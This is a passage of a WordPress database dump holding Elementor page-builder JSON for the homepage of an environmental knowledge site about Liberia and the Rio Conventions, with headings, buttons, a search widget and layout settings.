center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Click me\",\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5872,526,'_elementor_version','2.7.5'),(5873,526,'_elementor_template_type','wp-page'),(5875,527,'_wp_page_template','default'),(5876,527,'_elementor_edit_mode','builder'),(5877,527,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\